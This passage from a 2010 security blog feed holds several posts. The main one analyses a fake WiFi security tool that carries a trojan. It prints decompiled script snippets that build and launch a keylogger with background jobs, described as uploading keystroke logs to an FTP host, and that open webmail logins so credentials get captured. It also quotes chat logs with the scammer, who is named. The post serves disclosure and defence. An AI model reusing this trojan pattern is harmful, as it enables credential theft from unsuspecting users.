<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/05/1.jpg" rel="lightbox[517]"><img class="alignleft size-full wp-image-455" title="1" src="http://www.iamit.org/blog/wp-content/uploads/2010/05/1.jpg" alt="" width="128" height="128" /></a>Next up is <a href="http://2010.brucon.org/index.php/Main_Page">Brucon</a>. I’ve said enough about Brucon in the last conference schedule update, nevertheless, it’s shaping up to beat it’s last years’ reputation. Expecting great talks, great crowd, and awesome beer! As far as talks I’m looking forward to &#8211; will definitely catch up with <a href="http://2010.brucon.org/index.php/Presentations#You_Spent_All_That_Money_And_You_Still_Got_Owned...">Joe</a> which I missed at DefCon, <a href="http://2010.brucon.org/index.php/Presentations#Project_Skylab_1.0:_Helping_You_Get_Your_Cloud_On">Craig</a> who’s Skylab is of a personal/professional interest to me,  <a href="http://2010.brucon.org/index.php/Presentations#Head_Hacking_.E2.80.93_The_Magic_of_Suggestion_and_Perception">Dale</a> with the HeadHacking talk, and <a href="http://2010.brucon.org/index.php/Presentations#GSM_security:_fact_and_fiction">Fabian’s</a> GSM one. Obviously there are many more, but as I’ve learned over the years &#8211; don’t be greedy (especially not at conferences)&#8230;</p>
<p><img class="alignright" src="http://api.ning.com/files/jUHg0Ixbxo29hveVb0x42SaqpLXQ*aqhTqbDOQjh8LR0xJR6YWZY1EQMlV2ICqy-vXPnBPSxmrI29Lc4GU4cpHq7xIgnFstr/1.jpg?size=173&amp;crop=1:1" alt="" width="143" height="143" />Last but definitely not least, <a href="http://www.dissectingthehack.com/events/excaliburcon-2010">Excaliburcon</a> is going to happen after all! This year the location is going to be just outside of Beijing. We will all miss Wuxi a lot, but I’m really looking forward to checking out more of China. It was a great experience last year and I’m setting up my hopes pretty high for December as the <a href="http://twitter.com/ExcaliburCon/current-speakers/members">speaker list</a> is getting pretty hot!</p>
<p>The common threat across these three conferences is that unlike the “big ones”, they all allow the attendants a very close interaction with the talks. This really enables more information sharing and knowledge transfer, and I’ve really learned a lot more from smaller conferences such as these than from the big ones that sport a dozen tracks at the same time (think RSA&#8230; you are not going there for the content anymore&#8230;).</p>
<p>If you happen to be at one of those, feel free to ping me (or even better &#8211; buy me a beer <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  )!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/05/upcoming-conference-schedule/' rel='bookmark' title='Permanent Link: Upcoming Conference Schedule'>Upcoming Conference Schedule</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/06/the-community-to-the-rescue-again/' rel='bookmark' title='Permanent Link: The community to the rescue again'>The community to the rescue again</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/08/updated-speaking-schedule/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Remembering &#8220;The Shoe&#8221;</title>
		<link>http://www.iamit.org/blog/2010/08/remembering-the-shoe/</link>
		<comments>http://www.iamit.org/blog/2010/08/remembering-the-shoe/#comments</comments>
		<pubDate>Thu, 05 Aug 2010 16:47:44 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/08/remembering-the-shoe/</guid>
		<description><![CDATA[If you have been listening to any security podcasts in the past year or so, I’m sure you must have stumbled across the ISDPodcast (InfoSec Daily). If you haven’t, now’s the time to do so. Matthew Shoemaker, one of the podcasters along with Rick Hayes, has passed away last Friday. He left a wife and [...]


No related posts.]]></description>
			<content:encoded><![CDATA[<p>If you have been listening to any security podcasts in the past year or so, I’m sure you must have stumbled across the <a href="http://www.isdpodcast.com/">ISDPodcast</a> (InfoSec Daily). If you haven’t, now’s the time to do so.</p>
<p><a href="http://www.isdpodcast.com/about/matthew-m-shoemaker-1973-2010/">Matthew Shoemaker</a>, one of the podcasters along with Rick Hayes, has passed away last Friday. He left a wife and two kids behind him.<br />
I have had the great honor of being on the podcast, and to have a great conversation (on, and off the air) with both Rick and Matthew.</p>
<p>For donations to the Matthew Shoemaker memorial fund which would help out his wife and kids, Rick has set up a PayPal page &#8211; <span style="text-decoration: underline;"><a href="http://bit.ly/cVDsID">http://bit.ly/cVDsID</a></span>.</p>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/08/remembering-the-shoe/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tying up loose ends before Vegas (scammer closure)</title>
		<link>http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/</link>
		<comments>http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/#comments</comments>
		<pubDate>Mon, 26 Jul 2010 09:20:36 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[identity]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[summary]]></category>
		<category><![CDATA[technical]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=501</guid>
		<description><![CDATA[Instead of updating the post in question (again), I figured I&#8217;ll post all the new info here and call this a wrap. So, we all know about the security scammer now, and the different ways he is working to defraud innocent users and steal their data and money. It has been quite an experience tracking [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/' rel='bookmark' title='Permanent Link: How [not to] scam security people'>How [not to] scam security people</a></li>
<li><a href='http://www.iamit.org/blog/2010/02/the-chinagoogle-thing-accountants-and-other-miscreants/' rel='bookmark' title='Permanent Link: The China/Google thing, accountants and other miscreants'>The China/Google thing, accountants and other miscreants</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Instead of updating the <a href="http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/">post in question</a> (again), I figured I&#8217;ll post all the new info here and call this a wrap.</p>
<p>So, we all know about the security scammer now, and the different ways he is working to defraud innocent users and steal their data and money. It has been quite an experience tracking this scam down and getting all the facts right (from the technical aspect of inspecting the keylogger and binaries used to sniff your data, to actually communicating with the scammer and getting his take on things).</p>
<p>Nevertheless, I must say that I appreciate the consistency in which our scammer (I&#8217;ll call him Fadzil Mahfodh as that&#8217;s his real name) has been trying to mask his wrongdoings. From trying to go around the facts and divert us to other software:</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil1.png" rel="lightbox[501]"><img class="size-medium wp-image-502 alignnone" title="fadzil1" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil1-300x57.png" alt="" width="300" height="57" /></a></p>
<p>To &#8220;bragging&#8221; about his skills and the fact that his scripts are &#8220;leet&#8221; enough to get past some people:</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil2.png" rel="lightbox[501]"><img class="size-medium wp-image-503 alignnone" title="fadzil2" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil2-300x79.png" alt="" width="300" height="79" /></a></p>
<p>And finally to the obvious &#8211; throwing a fit and trolling &#8211; initially by threatning to post my picture and CV on adult websites (what would my CV be good for on an adult site anyway??? must be a Malaysian thing <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ):</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil3.png" rel="lightbox[501]"><img class="size-medium wp-image-504 alignnone" title="fadzil3" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil3-300x39.png" alt="" width="300" height="39" /></a></p>
<p>All of which has been accompanied by adding my picture to his website (wow! I&#8217;m famous now!):</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/Screen-shot-2010-07-26-at-11.54.25-AM.png" rel="lightbox[501]"><img class="size-medium wp-image-505 alignnone" title="Screen shot 2010-07-26 at 11.54.25 AM" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/Screen-shot-2010-07-26-at-11.54.25-AM-300x213.png" alt="" width="300" height="213" /></a></p>
<p>Getting it removed by the Google Blogger DMCA team, opening up a <a href="http://chikiabu.blogspot.com/">new blog site</a> to accompany the specific <a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/Screen-shot-2010-07-26-at-11.58.16-AM.png" rel="lightbox[501]"><img class="alignright size-medium wp-image-507" title="Screen shot 2010-07-26 at 11.58.16 AM" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/Screen-shot-2010-07-26-at-11.58.16-AM-181x300.png" alt="" width="181" height="300" /></a>&#8220;hack wpa without a dic&#8221; post along with my picture, and making some cosmetic changes to the site, removing the FBI log (which has been replaced with a larger DHS logo), and adding a disclaimer at his website stating that this is all a mistake, that I have been trying to pressure him into criminal actions, and that he has all our communications logged and will be happy to use it to prosecute. Too bad this has been removed from his site before I had a chance to document it &#8211; but trust me it was there! Pure epicness!</p>
<p>Now, I know &#8211; it&#8217;s not really fair to pick on these guys that hard. That&#8217;s why I&#8217;m leaving this to the Malaysia CERT (as you may have noticed, 1337 Fadzil forgot to proxy his connections to this blog and his IP has been logged on all comments and relevant hits on the site), to figure out how to handle. I truly hope that his suggestion to use the details provided on his paypal account and bank account will actually yield some results, and wish our friend the best of luck in his endeavors in the security business (although I highly doubt he&#8217;ll be at DefCon later this week).</p>
<p>Below are attached some of the additional supporting materials for the sake of fully disclosing all the communications with Fadzil.</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/fadzil.txt">Apache-access-log_FILTERED</a>, <a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/Fadzil-chat.rtf">Fadzil-chat</a>, <a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/karma-decoded.sh.txt">karma-decoded.sh</a>, <a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/bg2-decoded.sh.txt">bg2-decoded.sh</a></p>
<p><strong>8/18/2010 &#8211; Last update </strong>(I really hope)</p>
<p>All right, so it seems that the good guys actually win sometimes, so I had to post this quick update just to fill everyone in on what has been going on:</p>
<ol>
<li>The original site (yeah &#8211; the bad design, background music, scam outright) has been brought down. Not sure if it was the Google DMCA team that kept bugging Fadzil on removing my pics, or the Malaysia CERT that came down on him for the malicious and scamming techniques.</li>
<li>The replacement site (<a href="http://chikiabu.blogspot.com/">chikiabu.blogspot.com</a>) which has been originally set up just to host the infringing materials after Google rained down on Fadzil, is now actually the main site, and SURPRISE &#8211; it does not have the scamming software anymore!!! 2 points for the good guys.</li>
<li>The new site still has some &#8220;security&#8221; software. I have been getting some questions from readers who saw it and didn&#8217;t know whether to use it or not. So I had a few minutes to spare today, and have analyzed the &#8220;software&#8221; provided on it (namely &#8211; the famous fi.sh script which is the pinnacle of our subject&#8217;s programming skills). Long story short &#8211; still scripting with no real software in it. The fi.sh code is (again) a compiles shell script, and&#8230; here it is: <a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/fi.sh.txt">fi.sh</a> (the decompiled version of course). Funny thing is &#8211; obviously there&#8217;s no real coding here, just a bunch of &#8220;infconfig&#8221;, &#8220;iwconfig&#8221;, &#8220;airodump-ng&#8221; and &#8220;aircrack-ng&#8221;. One thing to note though, is that Fadzil makes it look as if each version of the script is designed for a specific wireless adapter &#8211; this of course can be achiever by correctly configuring your wireless adapter when running BT. Additionally, the posts on his website still entice users to send him their capture files (although at some point he makes the spelling error of saving a capture file as &#8220;.cab&#8221; &#8211; freudian?), and I&#8217;m guessing that he&#8217;s going to be asking for some &#8220;donation&#8221; to keep his site running. Don&#8217;t be tempted again kids&#8230;</li>
</ol>
<p>That&#8217;s all there is to it I guess. Again &#8211; good guys win, site cleaned (and hopefully bad guy learned his lesson). Keep your eyes open out there, and until next time (September in Barcelona and Brussles) bye!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/' rel='bookmark' title='Permanent Link: How [not to] scam security people'>How [not to] scam security people</a></li>
<li><a href='http://www.iamit.org/blog/2010/02/the-chinagoogle-thing-accountants-and-other-miscreants/' rel='bookmark' title='Permanent Link: The China/Google thing, accountants and other miscreants'>The China/Google thing, accountants and other miscreants</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Turkish hack and another case for IL-CERT</title>
		<link>http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/</link>
		<comments>http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/#comments</comments>
		<pubDate>Mon, 19 Jul 2010 05:44:25 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[CERT]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[press]]></category>
		<category><![CDATA[risk management]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[technology]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=499</guid>
		<description><![CDATA[You have been living under a rock if you haven&#8217;t heard of the Turkish hack a couple of days ago. Basically &#8211; a Turkish hacker forum that bolsters a strong anti-Israeli attitude has been practicing hacking and mostly defacing Israeli sites for the past few months (years). Now, this is nothing new, and as I [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/06/first-and-il-cert/' rel='bookmark' title='Permanent Link: FIRST and IL-CERT'>FIRST and IL-CERT</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
<li><a href='http://www.iamit.org/blog/2010/02/the-chinagoogle-thing-accountants-and-other-miscreants/' rel='bookmark' title='Permanent Link: The China/Google thing, accountants and other miscreants'>The China/Google thing, accountants and other miscreants</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>You have been living under a rock if you haven&#8217;t heard of the Turkish hack a couple of days ago. Basically &#8211; a <a href="http://www.cyber-warrior.org/">Turkish hacker forum</a> that bolsters a strong anti-Israeli attitude has been practicing hacking and mostly defacing Israeli sites for the past few months (years).</p>
<p>Now, this is nothing new, and as I stated before, has been going on for years. I&#8217;m not even going to go to the political discussion on whether this is sponsored by the government (or have been turned a blind eye by it), as opposed to Israeli hackers that would like to retaliate but know that they would be charged in their country for computer crimes.</p>
<p>No.</p>
<p>The focus here is that there was such a huge media outrage over the fact that so many (more than 100,000) user accounts have been affected, and everyone is scrambling to figure out who should have notified who on what. A couple of funny things to consider in this incident:</p>
<ol>
<li>There are more than a couple of companies in Israel that specialize in gathering intelligence on such forums as their core business. <a href="http://www.maglangroup.com/maglan/research.jsp">One company</a> has even been quoted that they knew of this issue months ago.</li>
<li>Some of the accounts that have been breached belong to government personnel (or at least have a .gov.il email account with it&#8217;s corresponding password).</li>
<li>The sites that have been breached were not notified until a couple of days ago. They have no-one to consult with in terms of how to handle this incident, or how to fix their issues (ever heard of one-way password hashing??? apparently not&#8230;).</li>
</ol>
<p>Why am I bringing up these specific point? Let&#8217;s see, and now from a perspective of a normal CERT that if would have been here would have addressed these as follows:</p>
<ol>
<li>Companies that deal with security research can send their insights over local security incidents to a coordinating entity &#8211; IL-CERT that would manage the anonymous and responsible notification to the affected parties. No need to figure out a local policy for notifications, no need to dig out contact details for obscure police departments and guesstimate whether they even care about your data, and no need to get into the politics of the existing semi-CERTS and who they constituency is.</li>
<li>Coordination and notification to government related bodies would  be handled through the <a href="http://cert.gov.il/">ILGOV-CERT </a>(although their website is not too promising, there are ways to reach them&#8230;). Additionally, collateral damage notification would also be handled in the same way (i.e. &#8211; a .gov.il site has not been breached, but .gov.il account have been found through breaching a .co.il server. This is the kind of thing that ILGOV-CERT does not know how to handle right now&#8230;).</li>
<li>Incident handling support and assistance would have been provided by subject-matter experts to any site that have experienced a breach. No cost associated (unless actual work on the servers or code would have been sought after, in which case the IL-CERT would have probably done a referral as initially it would not be a commercial body).</li>
</ol>
<p>Simple huh? And you keep wondering how come a place where so much innovation in science, technology and security has come from is still in the dark ages of it&#8217;s own internet security&#8230;</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/06/first-and-il-cert/' rel='bookmark' title='Permanent Link: FIRST and IL-CERT'>FIRST and IL-CERT</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
<li><a href='http://www.iamit.org/blog/2010/02/the-chinagoogle-thing-accountants-and-other-miscreants/' rel='bookmark' title='Permanent Link: The China/Google thing, accountants and other miscreants'>The China/Google thing, accountants and other miscreants</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How [not to] scam security people</title>
		<link>http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/</link>
		<comments>http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/#comments</comments>
		<pubDate>Thu, 08 Jul 2010 06:48:52 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Security Research]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[technical]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/</guid>
		<description><![CDATA[An analysis of a rogue security tool that tries to steal passwords and scam people out of their paypal money and accounts.


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/' rel='bookmark' title='Permanent Link: Tying up loose ends before Vegas (scammer closure)'>Tying up loose ends before Vegas (scammer closure)</a></li>
<li><a href='http://www.iamit.org/blog/2009/04/credit-cards-on-a-clearance-sale-and-your-internet-security/' rel='bookmark' title='Permanent Link: Credit cards on a clearance sale and your internet security'>Credit cards on a clearance sale and your internet security</a></li>
<li><a href='http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/' rel='bookmark' title='Permanent Link: The Turkish hack and another case for IL-CERT'>The Turkish hack and another case for IL-CERT</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I have been playing around with some wireless security for one of my customers lately. Having a pretty solid understanding of how things work, but also having been challenged to try out “everything there is to try” by the client, I went off to look for new tools that I might not have tried before.</p>
<p>It did not take too long, and with the accidental help of <a href="http://techcrunch.com/2010/07/05/employees-challenged-to-crack-facebook-security-succeed/">TechCrunch</a> (btw TechCrunch &#8211; you may want to change this link to something else after you read this&#8230;) I ran into <a href="http://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html">this</a> “Wifi Security” site.</p>
<p>Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a &lt;blink&gt; tag to drive you into an epileptic seizure, and the music, well, it’s music as part of a website &#8211; welcome to the 80’s.</p>
<p><img class="alignright size-full wp-image-485" title="used-by-fbi" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/used-by-fbi.png" alt="" width="188" height="176" />Not being deterred by the horrible design, I went ahead and downloaded the “tools” offered in the article. After all, the FBI are using this guy’s tools&#8230;<br />
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called “rogue.tar.gz”.<br />
When you get a shellscript that isn’t a shellscript, and is being reported as an “ELF” executable, you should get your detective hat on, which is exactly what I did.<br />
It didn’t take long, and the scam unfolded pretty quickly. Here’s a quick recap of what’s going on with this guy’s website:</p>
<ol style="list-style-type: decimal;">
<li>The provided “tools” aren’t even security tools. Initially I figured &#8211; ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even <a href="http://theta44.org/karma/index.html">karma</a> which the main script suggests that is being used (appropriately I might add for the purpose of what this script is SUPPOSED to do).</li>
<li>A quick look at the tarball revealed that is actually contains a keylogger that has been graciously stolen from <a href="http://code.google.com/p/logkeys/">here</a>.</li>
<li>When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They are taking care of compiling the keylogger, running it, and pushing the logged keys logfile to an FTP for the attacker (I guess we can call him that now) to use at his convenience.</li>
<li>You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the “automatic” processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!</li>
</ol>
<p>Observant readers may notice that I referred to the tool as having “supposed” script files, that are actually binaries, and now I refer back to them as scripts. What gives?<br />
Well, simply put, our attacker didn’t really take the time to code an application, he just wrote a couple of shell scripts, and in order to try to hide his malicious and ill-intent actions he “compiled” them with a utility that packs shellscripts in executable form called <a href="http://www.unixref.com/manPages/shc.html">shc</a>. The road from a linux executable to realizing what the script originally was is pretty short&#8230;</p>
<p>Now, that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs this. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, I’m sure that the annotations (true to the original) will shed some light&#8230;</p>
<blockquote><p># START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)<br />
cd lkl2<br />
./configure &#8211;silent<br />
make &#8211;silent<br />
make install &#8211;silent<br />
cd<br />
chmod +x /root/bg1.sh<br />
nohup /root/bg1.sh &amp;<br />
rm -r /root/nohup.out<br />
chmod +x /root/bg2.sh<br />
nohup /root/bg2.sh &amp;<br />
sleep 2<br />
rm -r /root/nohup.out<br />
clear</p></blockquote>
<p>So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.<br />
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:</p>
<blockquote><p># MENU LIST<br />
echo “”<br />
echo “&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; “<br />
echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “<br />
echo “&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; “<br />
echo “”<br />
echo “1. Compose indemnity text below and send to <a href="mailto:fadzilmahfodh@gmail.com">fadzilmahfodh@gmail.com</a>”<br />
echo “   Yes, I want activation code and will never use for illegal purpose”<br />
echo “”<br />
echo “2. Check your email for activation code after sending text “<br />
echo “”<br />
read -p “3. Send now ? (0=no, 1=yes) “ act<br />
clear</p></blockquote>
<p>Obviously, the message WILL appear, as this thing is NEVER going to be activated &#8211; remember &#8211; this is a shellscript, and the “menu” appears as-is unconditionally so you can try to activate this until blue in the face&#8230; but we are getting ahead of ourselves.</p>
<p>I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, here’s another little piece of “evidence” from the script:</p>
<blockquote><p>read -p  &#8220;Which backtrack are you using ? (bt3=3,bt4=4) &#8221; bt</p></blockquote>
<p>Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests&#8230; the script continues according to which version of BT is entered (to accommodate the differences in network configuration&#8230;).<br />
I’ll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isn’t running, and:</p>
<blockquote><p>firefox https://login.yahoo.com/ &amp;<br />
sleep 4<br />
firefox https://www.google.com/accounts/ManageAccount &amp;<br />
sleep 4<br />
firefox http://home.live.com/</p></blockquote>
<p>The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and it’s activities are uploaded in the background to the attacker’s FTP &#8211; this is exactly where most people will fall into the trap.</p>
<p>And for the grand finale &#8211; the actual activation (you’d think huh?):</p>
<blockquote><p>############################<br />
# DECOY FOR ACTIVATION CODE<br />
clear<br />
echo &#8220;&#8221;<br />
read -p &#8220;ENTER ROGUE AP ACTIVATION CODE : &#8221; pls<br />
sleep 3<br />
echo &#8220;You have entered an invalid code &#8221;<br />
echo &#8220;&#8221;<br />
exit<br />
############################</p></blockquote>
<p>You have to admit that commented code is the best! It’s actually saying “decoy”! How f*&amp;^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a “sleep 3” before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.</p>
<p>That’s about it for the technical analysis, but it wouldn’t be complete without the actual interaction with the attacker, wouldn’t it? Let’s see &#8211; so, we crafted a “request for free activation” email with the indemnity text in it, and guess what &#8211; we got a reply!</p>
<blockquote><p>Hi</p>
<p>1. We are preparing  the activation code for you.</p>
<p>2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c <a href="mailto:fadzilmahfodh@yahoo.com">fadzilmahfodh@yahoo.com</a> ?</p>
<p>Cheers.</p>
<p>EMAIL VIA MY CELLPHONE FOR FAST RESPONSE<br />
<a href="http://fadzilmahfodh.blogspot.com">http://fadzilmahfodh.blogspot.com</a></p></blockquote>
<p>So not only there is no activation code to be “prepared” for me (what? I’m going to feed it to the “decoy” and it’ll magically work?), we are being prompted to donate some cash for the poor bastard who worked so hard to make this tool for the community&#8230;<br />
I cordially answered that:</p>
<p>1. Thanks. I’ll be looking forward for the activation code.</p>
<p>2. I&#8217;ll probably consider it after being able to test out the tool.</p>
<p>Which was replied with a suggestion to try the trial version on his site (which relates to a completely different tool, but let’s not be too picky about it&#8230;).<br />
Now, thankfully, I was using one of my throw-away yahoo accounts, and apparently so our attacker. If you haven’t noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!<br />
Guess what happens next&#8230;</p>
<blockquote><p>&#8212;&#8211; Our chat on Wed, 7/7/10 2:53 PM &#8212;&#8211;<br />
Iftach(2:34 PM):  hey man<br />
Iftach(2:34 PM):  mind if a ask a couple of questions?<br />
fadzilmahfodh(2:34 PM):  okey<br />
Iftach(2:35 PM):  cool. I&#8217;m doing this research on security tools and their<br />
authors&#8230;<br />
fadzilmahfodh(2:35 PM):  okey<br />
Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write<br />
it, how well is it distributed in the community etc&#8230;<br />
Iftach(2:36 PM):  does that activation thing a common practice with free tools?<br />
fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need<br />
supporter<br />
fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for<br />
code<br />
Iftach(2:37 PM):  I see.<br />
fadzilmahfodh(2:37 PM):  i no longer able to provide for free<br />
fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my<br />
time and effort<br />
fadzilmahfodh(2:38 PM):  hope you understand</p></blockquote>
<p>Time and effort? Right&#8230; For a scam script that doesn’t even have any networking functionality&#8230; Ok, I’ll go along&#8230;</p>
<blockquote><p>Iftach(2:40 PM):  now, about the tool &#8211; that&#8217;s a linux binary obviously (thought<br />
it was a shell script at the beginning). Did you base it on something existing<br />
or write yourself?<br />
fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code<br />
Iftach(2:41 PM):  hence the activation i see&#8230;<br />
fadzilmahfodh(2:42 PM):  i can afford to give &#8216;free lunch&#8217; to everybody. Hope<br />
you understand<br />
Iftach(2:43 PM):  sure, i understand.<br />
fadzilmahfodh(2:43 PM):  So you interested in the software?<br />
Iftach(2:44 PM):  more from a research point of view &#8211; for an article I&#8217;m<br />
writing<br />
Iftach(2:44 PM):  so, the installer you use, I see that it contains some<br />
additional code that is being compiled on the client.<br />
fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user<br />
hardware<br />
Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that<br />
to verify that the client is a registered one?<br />
fadzilmahfodh(2:46 PM):  Well, that is another story&#8230;<br />
Iftach(2:46 PM):  I&#8217;m listening<br />
fadzilmahfodh(2:46 PM):  maybe some other time huh<br />
Iftach(2:47 PM):  OK. Last question &#8211; do you get a lot of account passwords<br />
through that keylogger that sends the data to your FTP?<br />
fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court</p></blockquote>
<p>At this point of my “interview” with him, I guess that my cover was going to get pretty real, hence this “article” that you are reading&#8230; You can’t make this stuff up so I figured I’ll blog it&#8230;</p>
<blockquote><p>Iftach(2:48 PM):  aha, and it&#8217;s part of the installer because? just to make sure<br />
people can send the activation email correctly?<br />
Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for<br />
